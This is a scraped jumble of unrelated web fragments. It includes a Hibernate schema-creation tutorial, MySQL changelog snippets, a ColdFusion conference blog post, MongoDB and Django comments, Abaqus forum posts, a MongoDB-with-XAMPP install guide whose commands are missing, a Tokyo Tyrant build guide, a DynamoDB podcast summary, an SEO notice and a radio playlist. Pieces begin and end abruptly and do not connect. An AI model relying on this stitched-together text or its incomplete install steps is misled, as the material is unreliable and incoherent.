Creating the table: first add <mapping class="com.eric.po.User"/> to hibernate.cfg.xml. Note: when using annotations you can still use .hbm.xml mapping files as well.

1. Create it manually:

   DROP TABLE IF EXISTS `e_user`;
CREATE TABLE `e_user` (
  `id` int(11) NOT NULL auto_increment,
  `yahoo` varchar(255) default NULL,
  PRIMARY KEY  (`id`),
  UNIQUE KEY `yahoo` (`yahoo`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

2. Use the <property name="hbm2ddl.auto">create</property> setting to create it automatically.

3. Use SchemaExport: new SchemaExport(new AnnotationConfiguration().configure()).create(true, true); (see the sketch below)

create(true, true) takes two parameters:

  1. @param script print the DDL to the console   
  2. @param export export the script to the database  
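
A minimal sketch (not from the original post) of wrapping that SchemaExport call in a runnable class, assuming the Hibernate 3.x annotations API used here and a hibernate.cfg.xml on the classpath:

import org.hibernate.cfg.AnnotationConfiguration;
import org.hibernate.tool.hbm2ddl.SchemaExport;

public class ExportSchema {

    public static void main(String[] args) {
        // Reads hibernate.cfg.xml (including the <mapping class="com.eric.po.User"/> entry).
        AnnotationConfiguration cfg = new AnnotationConfiguration().configure();

        // create(script, export): print the DDL to the console and run it against the database.
        new SchemaExport(cfg).create(true, true);
    }
}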

The table-creation statements Hibernate generates:

  drop table if exists E_USER
 create table E_USER (id integer not null auto_increment, yahoo varchar(255), primary key (id), unique (yahoo))



疯狂 2009-11-02 14:58

          InnoDB Primary Key versus Secondary Index: An Interesting Lesson from EXPLAIN        
InnoDB Primary Key versus Secondary Index: An Interesting Lesson from EXPLAIN
          MySQL Server 5.6.21        
  • InnoDB; Partitioning: Large numbers of partitioned InnoDB tables could consume much more memory…

Download | Version Info | Change log | Screenshots | System Requirements | Comments


          My cf.Objective() 2013 Presentations        

Other than noting back in January that all three(!) of my talk proposals were accepted, I haven't blogged about them since, so the only information about them is on the cf.Objective() web site. The session overviews give a fair sense of what you should get out of each presentation and roughly what they'll cover.

Since I have just now finished the three presentations and got all the code working, I thought I'd write up some thoughts about the talks, to help folks who are on the fence decide 'for' or 'against'.

  • Learn You a What for Great Good?, subtitled Polyglot Lessons to Improve Your CFML, this talk looks at some idioms and constructs in JavaScript, Groovy and Clojure (with a brief mention of Scala too), and shows how you can apply them to CFML. A common thread thru the examples is closures, added in ColdFusion 10 and Railo 4, and the code examples make heavy use of them, showing map, reduce, and filter functions operating on CFML arrays and structs to provide many of the benefits that collections have been providing to other languages for quite some time. From JavaScript, I also look at prototype-based objects, and show how to implement that in CFML.
  • ORM, NoSQL, and Vietnam plays on blog posts by Ted Neward and Jeff Atwood to put Object-Relational Mapping under the microscope and look at where the mapping breaks down and how it can "leak" into your code, making your life harder. After that I take a quick walk thru the general "No-SQL" space and then focus on document-based data stores as a good (better?) match for OOP and provide examples based on MongoDB and cfmongodb, with a quick look at how common SQL idioms play out in that world.
  • Humongous MongoDB looks at replica sets, sharding, read preference, write concern, map/reduce and the aggregation framework, to show how MongoDB can scale out to support true "Big Data". The talk will feature a live demo of setting up a replica set and using it from CFML, including coping robustly with failover, and a live demo of setting up a sharded cluster (and using it from CFML) to show how MongoDB handles extremely large data sets in a fairly simple, robust manner.

At the start of each of my talks, I have a "You Might Prefer..." slide listing the alternative talks you can attend if you don't fancy mine after you've seen the agenda slide - I won't be offended!

The slides (and all code) will be available after the conference. I'll post the slides to my presentations page and the code will go up on my Github repository. If any user groups would like me to do remote presentations of these talks later in the year (and record them and post them to Charlie Arehart's UGTV site), just contact me to figure out dates and times.


          Comment on Super Simple Storage for Social Web Data with MongoDB (Computing Twitter Influence, Part 4) by Matthew A. Russell        
To be honest, I probably don't understand enough about your situation to offer too much prescriptive advice here, and a lot of my initial questions back would be directed at figuring out if you *really* need Django+MongoDB specifically, or if there are existing admin UIs for MongoDB that might work or other approaches all together. Not sure if this link provides any administration UIs that might be useful to your situation, but I thought I'd go ahead and pass it on in case you hadn't run across it: http://docs.mongodb.org/ecosystem/tools/administration-interfaces/ More to your point, though, I don't have any great suggestions on how to do what you are asking apart from finding an existing admin UI for MongoDB or writing some custom model code.
          Comment on Super Simple Storage for Social Web Data with MongoDB (Computing Twitter Influence, Part 4) by hahaconda        
Matthew, is it possible to make tutorials on how to integrate django and mining to show tweets i mined in web interface? The problem here that Django is highly relational in its nature, and even if i would use http://django-mongodb-engine.readthedocs.org/en/latest/tutorial.html or http://mongoengine-odm.readthedocs.org/en/latest/tutorial.html i still need to make a model classes with relations (thats ruins advantages of using such approach). What i want is to store tweets in Mongodb as json and then (without writing models) show them in the admin and user interface (maybe only screen names, date, retweet status) - but i still need to save all tweet, not only certain fields. What's your advice?
          Comment on Quick Start by How To Mine Your GMail with Google Takeout and MongoDB | Mining the Social Web        
[…] Quick Start […]
          "A Lightweight Disk based JSON Database with a MongoDB like API for Node."        
“A Lightweight Disk based JSON Database with a MongoDB like API for Node.”

- diskDB by arvindr21
          New release of Abaqus2Matlab: GUI, reading .odb and much more!        

A2M GUI interface 

Dear imechanicians,

A new version of Abaqus2Matlab has just been released and I hope that it is of interest to you.

This new release constitutes a very significant step forward in the development of this well-known software to connect Abaqus and Matlab.

Abaqus2Matlab is now offered as an easy-to-install Matlab App that includes the following novelties:

 

  • The possibility to postprocess not only .fil files, but also .odb and .mtx
  • A new Graphical User Interface (GUI) that enables the user to easily request output variables and automatically creates a Matlab script with all the required information.

 

Everything has been extensively documented, including video tutorials. For more information visit www.abaqus2matlab.com

We hope that you enjoy it and we look forward to hearing your feedback


          Heat Transfer and static analysis of steel beam shell element (odb. output)        

Hi all...

I am having difficulty extracting the .odb file from a heat transfer analysis of a shell-element steel beam together with a fire protection element. I edited the keywords to produce NT (nodal temperature) output so it can be used in the static analysis. But in the static analysis results, the steel beam shows the same deflection no matter what thickness of protective coating I apply to it. Is it possible to write TEMP values instead of NT (nodal temperature) into the .odb file? The TEMP output seems to give a more realistic member temperature through the section points. However, I could not find any way to extract an .odb file containing TEMP output. What should I write in the keyword editor to get TEMP written to the .odb output file, so that the static analysis can read the .odb file with TEMP output instead of NT (nodal temperature)?

Does anyone have an idea that could help solve this problem? The steel beam should show a decreasing member temperature when exposed to heat once the protection material is applied, and consequently the deflection should also decrease with the lower temperatures determined in the earlier heat transfer analysis. I would really appreciate any help.

Thank you


          Install MongoDB with XAMPP on Ubuntu        
I want to share a bit about my experiments installing MongoDB on my Ubuntu 10.10 box, with the goal of integrating it directly with XAMPP. I wandered around the internet until I was thoroughly confused about how to install MongoDB. There are plenty of examples, but none quite fit; either they really didn't apply or my brain was just fried (I'm being chased by my thesis deadline, so I'm a bit out of sync).. :nohope

Luckily I found this site, which matched exactly what I wanted, though unfortunately the language is rather advanced, hehe.. Other sites all describe different approaches, some starting from installing PHP standalone and then installing PECL, which is a hassle.. But in essence, follow the steps from that site.

Not wanting to complicate things, I decided to just use XAMPP. As it happens I had already installed regular XAMPP before; it's easy enough and there are plenty of tutorials. The difference here is that we need the development version of XAMPP. I'm not yet sure exactly what it's for, but it seems to have something to do with the PHP API plus the Zend Module API.. cmiiw

Oh, and if you don't know what MongoDB is yet, head over to the official site at
http://www.mongodb.org/
OK, let's get straight to the installation. The first step is to install the development version of XAMPP, as discussed above. The process is the same as installing regular XAMPP; make sure you grab the Linux version and not anything else. Download it from the official XAMPP site, or use this link. This is version 1.7.4, but don't forget to install the regular version of XAMPP first. Here's the command to extract it after downloading:

Next, install MongoDB. The easiest way is with apt-get or the Synaptic package manager, which of course requires an internet connection. Let's assume we already have one; who isn't online these days, hehehe, just kidding.. :p

To install MongoDB via Synaptic, search for the keyword mongodb and mark mongodb-10gen; that's the package that will be installed on your Ubuntu system.
So how do you install it from the terminal instead? I'm not really a GUI person..
It's the same as installing any other package. The command is:

At this point I'll assume MongoDB is installed on your Ubuntu machine. If you run into problems, feel free to comment here so we can look for a solution together, or you can try to figure it out on your own..

Next we connect XAMPP to MongoDB using the MongoDB PHP driver. It would be a shame to have MongoDB installed but not be able to use it from our own website, hoho..

The official tutorial is here if you'd rather do it your own way, but it only confused me, because it tells you to install PECL even though XAMPP already bundles PECL in its installation, and the steps aren't complete anyway, so I just got more muddled. In the end I decided to build the driver manually from source..

First, set up the PATH; this keeps the installation from getting messy. Some people also set LD_LIBRARY_PATH, but when I tried that, a lot of programs started failing. I looked into why and found a site stating that modifying LD_LIBRARY_PATH is somewhat harmful, because many dynamic libraries then have to be re-linked to work properly. Is that right? At least that's my understanding so far, cmiiw..
To set the path, just add the line below to /etc/bash.bashrc,

Back to the driver. The download link for the driver is:
https://github.com/mongodb/mongo-php-driver/downloads
Once it's downloaded, extract it wherever you like. Then go into the extracted directory and type this command:

Hopefully everything has gone smoothly on your machine so far; as usual, if you hit errors, post them here and I'll help as much as I can..

Now, don't close the terminal just yet; first check whether the following line is present:
/opt/lampp/lib/php/extensions/no-debug-non-zts-/mongo.so

Don't be confused by that; it's just an id generated by GitHub when you downloaded the driver. Just check whether mongo.so is actually there. If it is, the driver build succeeded.

The next step is to enable the mongo.so module in php.ini. Open php.ini at /opt/lampp/etc/php.ini and add this line:

The last step is to restart XAMPP, and MongoDB plus the driver are now installed on your beloved Ubuntu, hooked up to XAMPP. For a final test I used a web-based MongoDB management tool, phpMoAdmin; its site is:
http://www.phpmoadmin.com/
That's all for my little story this time; hopefully it's useful to all of you..

          Weekly Update – January 20, 2015        
Total Deal Value (USD) – $1,595,370,011
Total Deal Number – 60

Deal No. | Amount Paid (USD) | Company      | Investor/Buyer | Sector              | Deal Type
1        | $600,000,000      | Kuaidi Dache | Consortium     | Mobile & Apps       | Investment
2        | $220,000,000      | Instacart    | Consortium     | Transactions        | Investment
3        | $186,000,000      | lynda.com    | Consortium     | Media               | Investment
4        | $80,000,000       | MongoDB      | Consortium     | Software & Services | Investment
5        | $55,000,000       | […]
          Maxwell Health Reduces Cloud Storage Costs and Recovery Times with Datos IO RecoverX for Cloud Backup and Recovery        
Datos IO’s RecoverX platform solves operational challenges and reduces total cost of ownership for Maxwell’s SaaS based platform on MongoDB databases deployed on Amazon AWS public cloud SAN JOSE, Calif., Aug. 10, 2017 — /BackupReview.info/ — Datos IO, the application centric cloud data management company, today announced that Maxwell Health, an HR and benefits technology [...] Related posts:
  1. Datos IO Extends RecoverX to Meet Backup and Recovery Needs for Cloud-Native Workloads On Amazon Web Services
  2. TechTarget Names Datos IO RecoverX Storage Product of the Year Finalist
  3. Datos IO RecoverX Selected as Product of the Year 2016 by Storage Magazine
  4. Datos IO Introduces RecoverX, Industry-First Scale-Out Data Protection Software for Cloud Native and Big Data Environments
  5. Datos IO Teams with NetApp to Deliver Transformational All-Flash Storage and Cloud Data Protection Solution for Next-Generation Data Center Applications

          We are looking for a colleague for a Senior Software Engineer (home office) position. | Responsibilities: Implementing...        
We are looking for a colleague for a Senior Software Engineer (home office) position. | Responsibilities: Implementing new functionality and user interactions, in tandem with corresponding changes to the API back-end. • Improving usability, speed and ensuring our pages render responsively on various browser sizes • Extending the capabilities of our back-end platform's API, including helping move to our new v2 API. • Helping us move away from a monolithic Rails backend towards a more Service-Oriented Architecture • Refactoring and bug-fixing the platform • Extending our test coverage. | What we offer: Attractive opportunity: • Entrepreneurial and non-hierarchical working environment • Interesting co-workers with diverse and international backgrounds • Comfort of working from home | Requirements: Technical Requirements: • Degree educated with a minimum of 3 years software development experience • Experience in Object Oriented languages & domain driven design • Experience in Behaviour-Driven and/or Test-Driven Development • Strong understanding of HTML, CSS and JavaScript • Strong understanding of the HTTP request/response cycle, and the operation of modern web frameworks • Strong understanding of MVC architectures, object-oriented design, database design, JSON APIs and agile development techniques • Experience with MySQL, PostgreSQL or similar RDBMS • Unix / Linux / Mac OS X command-line proficiency • Version control, preferably with Git • Experience with Redis, ElasticSearch and MongoDB a plus • A passion for clean, simple, well-tested code • Proven track-record in open source a plus • Proven track-record in full-stack performance enhancement a plus | Other Requirements: • Ability to work & communicate effectively with a geographically dispersed team • Ability to work in an Agile software environment with high level requirements • Must be flexible and able to work with changing priorities • Must be within European Time-zones • Must have excellent written and verbal English language skills | More info and application here: www.profession.hu/allas/1053745
          We are looking for a colleague for a Java Developer position. | Responsibilities: Participation in the company's Java-based...        
We are looking for a colleague for a Java Developer position. | Responsibilities: Participation in the company's Java-based software development projects • Participation in software requirements analysis and software design • Working in task-focused teams of 2-5 people • Software implementation, documentation, integration and testing. | What we offer: A stable, international background • Interesting, varied and professionally challenging tasks • Continuous professional development through exciting, innovative projects • A motivating, supportive team • Competitive salary | Requirements: Confident, with at least 2-3 years of Java Spring development experience • Experience in developing complex web applications • You know and use application servers such as Tomcat and Wildfly • NoSQL database systems such as MongoDB are not foreign to you • You have development experience with the Vaadin framework • You have worked with HTML5 and CSS3 as well as SCSS • You work independently, creatively and with a proactive attitude • You like to communicate, keep in touch and cooperate with others • You have an intermediate level of active English | Additional requirements: A relevant higher-education degree • Knowledge of relational database systems such as Oracle, MS SQL, MySQL, etc. • Knowledge of Jasper Reports • Knowledge of the Git version control system | More info and application here: www.profession.hu/allas/1050250
          MongoDB Atlas is now available on top cloud platforms        
MongoDB has announced that MongoDB Atlas, its cloud database as a service, is now available to u…
          MongoDB delivers financial data up to 250x faster says IHS Markit        
The data delivery service is powered by a complex infrastructure originally built on a relational da…
          Install Tokyo Tyrant on Ubuntu (with Lua)        

I’ve been getting increasingly interested in alternative databases of late. By alternative I mean non-relational databases, of course.

There are a number of document / key value stores in development at the moment. They include projects like HBase, CouchDB, MongoDB and much more.

What has really grabbed my attention at the moment is Tokyo Cabinet. It’s a fascinating datastore that promises excellent performance along with great data security features like master-master replication.

This post isn’t about the features of Tokyo Cabinet, it’s about getting it installed so you can start playing with it yourself. The Igvita blog has a great write-up about why Tokyo Cabinet is relevant, so head over to Tokyo Cabinet: Beyond Key-Value Store for the juicy details. Once you’re impressed, head back here to install it and start playing!

The latest source versions at the time of writing are Tokyo Cabinet 1.4.29 and Tokyo Tyrant 1.1.31.

First, let's install some build dependencies:


sudo apt-get install checkinstall build-essential libbz2-dev zlib1g-dev libreadline5-dev


$ mkdir /src
$ cd /src

We need to install Lua first. Download the sources, extract them and change into the source folder:


$ cd /src
$ wget http://www.lua.org/ftp/lua-5.1.4.tar.gz
$ tar zxf lua-5.1.4.tar.gz
$ cd lua-5.1.4

Now let's compile it.


$ make linux test
$ make install

Once that’s done, it should print out something like the following:


Hello world, from Lua 5.1!

Now we download and compile Tokyo Cabinet (latest version at time of writing is 1.4.29):


$ cd /src
$ wget http://tokyocabinet.sourceforge.net/tokyocabinet-1.4.29.tar.gz
$ tar xvf tokyocabinet-1.4.29.tar.gz
$ cd tokyocabinet-1.4.29
$ ./configure; make; make install

Next up is Tokyo Tyrant (latest version at time of writing is 1.1.31):


$ cd /src
$ wget http://tokyocabinet.sourceforge.net/tyrantpkg/tokyotyrant-1.1.31.tar.gz
$ tar xvf tokyotyrant-1.1.31.tar.gz
$ cd tokyotyrant-1.1.31
$ ./configure --enable-lua; make; make install

To test that Tokyo Tyrant is installed and working, type the following:


$ ./ttserver

You should see something like the following:


2009-07-15T09:57:06-06:00       SYSTEM  --------- logging started [5469] --------
2009-07-15T09:57:06-06:00       SYSTEM  server configuration: host=(any) port=1978
2009-07-15T09:57:06-06:00       SYSTEM  opening the database: *
2009-07-15T09:57:06-06:00       SYSTEM  service started: 5469
2009-07-15T09:57:06-06:00       INFO    timer thread 1 started
2009-07-15T09:57:06-06:00       INFO    worker thread 1 started
2009-07-15T09:57:06-06:00       INFO    worker thread 2 started
2009-07-15T09:57:06-06:00       INFO    worker thread 3 started
2009-07-15T09:57:06-06:00       INFO    worker thread 4 started
2009-07-15T09:57:06-06:00       INFO    worker thread 5 started
2009-07-15T09:57:06-06:00       INFO    worker thread 6 started
2009-07-15T09:57:06-06:00       INFO    worker thread 7 started
2009-07-15T09:57:06-06:00       INFO    worker thread 8 started
2009-07-15T09:57:06-06:00       SYSTEM  listening started

To end the server, simply press Ctrl-C.

Of course, chances are you want the Tyrant server to start on bootup. To do this, we copy the ttservctl script to the /etc/init.d/ directory, make it executable and tell Ubuntu to start it at boot time:


$ cp /usr/local/sbin/ttservctl /etc/init.d
$ chmod +x /etc/init.d/ttservctl
$ update-rc.d ttservctl start 51 S .

Don’t forget the dot at the end of that last line.

You can now also use /etc/init.d/ttservctl to stop, start and restart the service.

Start the server:


/etc/init.d/ttservctl start

Stop the server:


/etc/init.d/ttservctl stop

Restart the server:


/etc/init.d/ttservctl restart

Now that you have it installed, you can connect to it and use it with one of the available language bindings. Currently there are Ruby, Python, Perl and Java interfaces available. See the Tokyo Cabinet page for more details on using those.
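
If you just want to poke at the server before installing a binding, the little Python sketch below is one way to do it. It is only an illustration under a couple of assumptions: ttserver is running locally on the default port 1978, and the memcached-compatible text protocol is accepted on that same port (the 1.1.x ttserver multiplexes its own protocol, a memcached-compatible protocol and HTTP on one socket). The helper names tt_set and tt_get are made up for this sketch; if the assumptions don't hold for your build, use one of the bindings mentioned above instead.

# tokyo_tyrant_quick_test.py -- minimal sketch, not production code.
# Assumes ttserver is listening on 127.0.0.1:1978 and accepts the
# memcached-compatible text protocol on that port.
import socket

def tt_set(sock, key, value):
    data = value.encode()
    sock.sendall(("set %s 0 0 %d\r\n" % (key, len(data))).encode() + data + b"\r\n")
    return sock.recv(1024)   # expect b"STORED\r\n"

def tt_get(sock, key):
    sock.sendall(("get %s\r\n" % key).encode())
    return sock.recv(4096)   # expect VALUE <key> 0 <len>\r\n<data>\r\nEND\r\n

if __name__ == "__main__":
    with socket.create_connection(("127.0.0.1", 1978)) as s:
        print(tt_set(s, "hello", "world"))
        print(tt_get(s, "hello"))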

          RR 314 DynamoDB on Rails with Chandan Jhunjhunwal        


Today's Ruby Rogues podcast features DynamoDB on Rails with Chandan Jhunjhunwal. DynamoDB is a NoSQL database that frees your team from infrastructure-management concerns like setup, cost, and maintenance. Take some time to listen and learn more about DynamoDB!

[00:02:18] – Introduction to Chandan Jhunjhunwal

Chandan Jhunjhunwal is the owner of Faodail Technology, which currently helps many startups with their web and mobile applications. He started at IBM, designing and building scalable mobile and web applications, mainly working on C++ and DB2, and later worked primarily on Ruby on Rails.

Questions for Chandan

[00:04:05] – Introduction to DynamoDB on Rails

I would say that the majority of developers work with PostgreSQL, MySQL or another relational database. On the other hand, Ruby on Rails is picked up by many startups and founders to actually implement their ideas and turn them into scalable products. I would say that more than 80% of developers mostly work with RDBMS databases. For the remaining 20%, their applications need to capture large amounts of data, so they go with NoSQL.

In NoSQL, there are plenty of options like MongoDB, Cassandra, or DynamoDB. When using AWS, there is no managed MongoDB service. Cassandra requires a lot of infrastructure setup and cost, and you have to have a team maintaining it on a day-to-day basis. DynamoDB takes all of that pain away from your team, and you no longer have to focus on managing the infrastructure.

[00:07:35] – Is it a good idea to start with a regular SQL database and then, switch to NoSQL database or is it better to start with NoSQL database from day one?

It depends on a couple of factors. Many applications start with an RDBMS because they just want to get something working, and probably switch to something like NoSQL later. First, you have to watch the incoming data and its volume. Second is familiarity, because most developers are more comfortable with RDBMS and SQL queries.

For example, say you have a feed application or a messaging application, where you know there will be a lot of chat happening and you expect to attract a huge number of users. You could accommodate that in an RDBMS, but I would probably not recommend it.

[00:09:30] Can I use DynamoDB as a caching mechanism or cache store?

I would not say a replacement, exactly. On those segments where I could see a lot of activity happening, I plugged in DynamoDB; the remaining part of the application was handled by the RDBMS. In many applications, what I've seen is that they use a combination of the two.

[00:13:05] How do you decide if you actually want to use DynamoDB for all the data in your system?

The case where we say an application should be built on it from day one is when we know the volume of incoming data will keep increasing. It also depends on the development team you have, and whether they are familiar with DynamoDB or other NoSQL databases.

[00:14:50] – Is DynamoDB a document store, or does it have columns?

You could call it a key-value store or a document store. The terminology is just different, as is the way you design the database. In DynamoDB, you have a hash key and a range key.
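
To make the hash key / range key idea concrete, here is a minimal sketch of defining such a table with boto3, the AWS SDK for Python. This is not code from the episode or the guest's blog; the table name chat_messages and the attribute names are invented for illustration.

# Minimal sketch (not from the episode): a DynamoDB table with a hash
# (partition) key and a range (sort) key, using boto3.
import boto3

dynamodb = boto3.resource("dynamodb", region_name="us-east-1")

table = dynamodb.create_table(
    TableName="chat_messages",
    KeySchema=[
        {"AttributeName": "conversation_id", "KeyType": "HASH"},   # hash key
        {"AttributeName": "sent_at", "KeyType": "RANGE"},          # range key
    ],
    AttributeDefinitions=[
        {"AttributeName": "conversation_id", "AttributeType": "S"},
        {"AttributeName": "sent_at", "AttributeType": "N"},
    ],
    ProvisionedThroughput={"ReadCapacityUnits": 5, "WriteCapacityUnits": 5},
)
table.wait_until_exists()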

[00:22:10] – Why don’t we store images in the database?

I would say there are better places to store them, which are faster and cheaper. There is better storage, like a CDN or S3.

Another good reason is that if you want to fetch a properly sized image based on the user's device screen, resizing and all of that inside the database would be cumbersome. You would keep adding columns just to store the different sizes of images.

[00:24:40] – Is there a potentially good reason for NoSQL database as your default go-to data store?

If you have data that is completely unstructured and you try to store it in an RDBMS, it will be a pain. If we talk about the kind of media that gets generated in our day-to-day lives, modeling it in a relational database is pretty painful, and eventually there comes a time when you don't know how to create the correlations.

[00:28:30] – Horizontally scalable versus vertically scalable

With vertical scaling, when someone posts, we keep adding rows to the same table on a single machine, so the database size (the number of rows) grows in one place. With horizontal scaling, we spread the data across different boxes, connected via something like Hadoop or Elastic MapReduce, which processes the added data.

[00:30:20] – What does it take to hook up a DynamoDB instance to a Rails app?

We can integrate DynamoDB using the SDK provided by AWS. The steps are outlined in the blog post: how to create the different kinds of tables, how to create the indexes, how to set the provisioned throughput, and so on. We configure the AWS SDK, add the required credentials, and then we can create the different kinds of tables.
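
For readers who just want to see the shape of those calls, here is a short generic sketch continuing the hypothetical chat_messages table above. It uses boto3 rather than the Ruby/Rails code from the guest's blog post, so treat it as an illustration of the API, not the blog's steps.

# Writing an item and querying a conversation by its hash key (boto3 sketch,
# continuing the hypothetical chat_messages table defined earlier).
import time
import boto3
from boto3.dynamodb.conditions import Key

table = boto3.resource("dynamodb", region_name="us-east-1").Table("chat_messages")

table.put_item(Item={
    "conversation_id": "alice#bob",
    "sent_at": int(time.time()),
    "body": "hello there",
})

resp = table.query(KeyConditionExpression=Key("conversation_id").eq("alice#bob"))
for item in resp["Items"]:
    print(item["sent_at"], item["body"])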

[00:33:00] – In terms of scaling, what is the limit for something like PostgreSQL or MySQL, versus DynamoDB?

Practically speaking, there is no hard scalability limit in DynamoDB or similar NoSQL solutions, whereas a single PostgreSQL or MySQL instance eventually runs into the vertical limits of its hardware.

Picks

David Kimura            

  • CorgUI

Jason Swett     

  • Database Design for Mere Mortals

Charles Max Wood

  • VMWare Workstation
  • GoCD
  • Ruby Rogues Parley
  • Ruby Dev Summit

Chandan Jhunjhunwal     

  • Twitter @ChandanJ
  • chandan@faodailtechnology.com

          LetoDB client/server RDD for xHarbour        
From sunny Mallorca we read a very interesting note by BielSys (Gabriel Maimó, "Biel") about an open source project by Alexander Kresin.

http://bielsys.blogspot.com/2008/07/letodb-rdd-cliente-servidor-para.html

Thanks BielSys, your blog is very interesting.
          Under the Hood: Architectural Overview of Netmera Search        
One of the most important features of the Netmera Platform is full-text search. This feature really sets Netmera apart from other backend cloud services: you can serve unstructured data very efficiently in your app via Netmera. With Netmera Search, our backend services are particularly useful for media- and content-based applications.

In this post, I will talk about the search feature of Netmera and technologies that we use to develop it.

Netmera stores data in the NoSQL database MongoDB, which offers scalable, high-performance, schema-free data storage. MongoDB provides a reliable data store and fast queries, and it offers several useful querying options; however, it has limited search functionality. You can't create a MongoDB index that allows efficient searching on every field, and indexing all fields causes memory problems. Due to MongoDB's limited search features, we decided to use a search engine for this purpose. We analyzed the available search engines and chose Solr because of its maturity and the large community behind it.

Solr is an open source search platform based on the Lucene search engine. It provides full-text search, faceted search, analyzing/stemming/boosting of content, and some other useful features. It can perform complex queries, handle millions of documents, and scale horizontally. Since Solr can also store data and return it during search, we initially decided to store content in Solr instead of MongoDB. However, we observed that Solr's query performance decreases as the index size grows. We realized that the best solution is to use Solr and MongoDB together, so we integrated them by storing content in MongoDB and building the full-text index with Solr. We store only the unique id of each document in the Solr index and retrieve the actual content from MongoDB after searching in Solr. Getting documents from MongoDB is faster than from Solr because there are no analyzers, scoring, and so on. With this hybrid approach we get the benefits of both technologies.
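
As a rough sketch of what that hybrid lookup looks like in code (this is not Netmera's implementation), the snippet below assumes a Solr core whose documents carry only an indexed doc_id field, a MongoDB collection holding the canonical documents under the same ids, and the pysolr and pymongo client libraries. The core name, database name, and field names are placeholders.

# Hybrid lookup sketch: ids from Solr, documents from MongoDB.
import pysolr
from pymongo import MongoClient

SOLR_URL = "http://localhost:8983/solr/contents"   # hypothetical core name

solr = pysolr.Solr(SOLR_URL)
contents = MongoClient("mongodb://localhost:27017")["netmera_demo"]["contents"]

def search(text, rows=10):
    # 1) full-text search in Solr, fetching only the stored ids
    hits = solr.search(text, rows=rows, fl="doc_id")
    ids = [hit["doc_id"] for hit in hits]
    # 2) pull the actual documents from MongoDB, preserving Solr's ranking order
    docs = {d["doc_id"]: d for d in contents.find({"doc_id": {"$in": ids}})}
    return [docs[i] for i in ids if i in docs]

for doc in search("istanbul concert"):
    print(doc.get("title"))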

Netmera search is composed of three layers described below.

1. Content Indexing
While content is being added to the cloud, it is also added to the search index. Before text (the metadata of media, or the text content itself) gets indexed, it is tokenized and analyzed. For this purpose, we developed our own FilterFactory to analyze Turkish data. Solr has a built-in stemmer, but it doesn't provide precise results for the Turkish language. We use Zemberek, an open source natural language processing library for Turkic languages, to stem terms, and with this process we achieve more accurate search results. We also created a stop word list (common words in the language) for Turkish and remove those words from documents during indexing, which improves indexing time.

At the moment we have extended Solr for Turkish, but we plan to optimize our search engine for other languages as well. We would like to hear your recommendations for additional libraries for other languages; feel free to mention available language extensions in the comments.

2. Searching
This layer provides the ability to search content inside the search index. Besides full-text search, Netmera can also do geo-location search. To make location search possible, latitude and longitude values are indexed for all location-related content. Our search engine can then perform two kinds of geo-location searches, described below:

Box Search: Given two corner points, a box is created and the content inside the box is listed. This feature can be used on a map to find locations or content inside a map area.

Circle Search: Given a point (latitude, longitude) and a distance (the radius of the circle), a circle is created and the content inside the circle is listed. This search method is best used to find nearby content around a user.
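
One common way to express such a circle search on the Solr side is the built-in geofilt spatial filter; the sketch below is only an illustration of that mechanism, not Netmera's schema. The field name location (assumed to be a lat/lon spatial field), the core URL, and the example coordinates are all placeholders.

# Circle search sketch with Solr's geofilt filter, via pysolr.
import pysolr

solr = pysolr.Solr("http://localhost:8983/solr/contents")

# content within 5 km of a point (lat,lon), still ranked by the main query
results = solr.search(
    "concert",
    **{
        "fq": "{!geofilt}",
        "sfield": "location",
        "pt": "41.0082,28.9784",   # example point (Istanbul)
        "d": "5",                  # distance in kilometers
    }
)
for r in results:
    print(r.get("doc_id"))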

3. Ranking
Content retrieved from the search index is ranked by Lucene's scoring algorithm. It is a complex algorithm, but in general it is based on the frequency of the search term in individual documents and in the overall index. Our current R&D efforts focus on customizing search scores (ranking) by adding new factors such as social context, popularity and location to the search. That way, different types of applications will be able to find and show the most relevant content to their users. We are still working on this feature and will publish a detailed blog post when it is released.
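
For readers curious how such extra signals can be layered on top of Lucene's relevance score, one generic option in Solr is a boost function on the eDisMax query parser. The sketch below is purely illustrative: the popularity field, field weights, and core URL are invented, and this is not the ranking customization Netmera describes as still in development.

# Layering a popularity signal on top of the text relevance score (sketch).
import pysolr

solr = pysolr.Solr("http://localhost:8983/solr/contents")

results = solr.search(
    "concert",
    **{
        "defType": "edismax",
        "qf": "title^2 body",           # text fields to match, title weighted higher
        "bf": "log(sum(popularity,1))", # additive boost from a numeric field
    }
)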

This is a general overview of our search feature. Feel free to contact me for any questions and feedback.

          SEO - oknotizie.virgilio.it shuts down for good: here are the 10 best alternatives for driving traffic to news sites (filippodb)        
filippodb writes in the SEO category: OKNotizie was an excellent platform for verifying information, leaving little room for the publication of fake news, which was flagged by most visito…
Go to the latest updates on: oknotizie, diggita, social bookmarking, social publishing, participatory journalism
3 votes

Go to the full article » oknotizie.virgilio.it shuts down for good: here are the 10 best alternatives for driving traffic to news sites.
          Robomongo        
Robomongo is a native GUI client for MongoDB. So far I’ve used RockMongo, which was perfect for me, but it’s PHP-based and quite hard to install. Also, it seems to be abandoned; the last commit was in 2015. It’s a pity… Robomongo is simple. Just download, decompress, and launch. It’s free and multi-platform. Filed under: mongodb […]
          Restless Mornings 06-06-2015 with Desdemona Finch        
Playlist:

Big Mama Thornton- Unlucky Girl - In Europe
Dirty Dozen Brass Band- What You Want - New Orleans Funk 3
Kuf Knotz- Inertia - A Positive Light
Opium Jukebox- Anarchy In The UK - Never Mind The Bhangra Heres The Opium Jukebox
Gangstagrass- John Henry feat Soul Khan Dan Whitener - American Music
Dwight Yoakam- Man Of Constant Sorrow - Second Hand Heart
The Hot Sardines- Your Feets Too Big - The Hot Sardines
Bobby Bland- I Pity The Fool - Mojo Presents DavdHeroesBowie
- voicebreak -
Dom La Nena- Menino - Soyo
Decker- ODB - Patsy
Flavia Coelho- Por Cima - Mundo Meu
Compilation- Partido Alto - Putumayo Presents Brazilian Beat
Kacey Musgraves- Stupid - Same Trailer Different Park
Brandi Carlile- Alibi - The Firewatchers Daughter
Pokey LaFarge- Something In The Water - Something In The Water
Shakey Graves- Hard Wired - And The War Came
Sun Ra- Trying To Put The Blame On Me Live In Rome 1977 - Marshall Allen Presents Sun Ra And His Arkestra In The Orbit Of Ra
Gangstagrass- Wade In The Water feat Liquid Dolio The Sleuth Samantha Martin Delta Sugar - American Music
Robert Earl Keen- Walls Of Time - Happy Prisoner The Bluegrass Sessions Deluxe Edition
Hard Working Americans- Come From The Heart with Rosanne Cash - The First Waltz
- voicebreak -
Buddy Miller- Dont Wait - Universal United House Of Prayer
Steve Earle The Dukes- Babys Just As Mean As Me feat Eleanor Whitmore - Terraplane
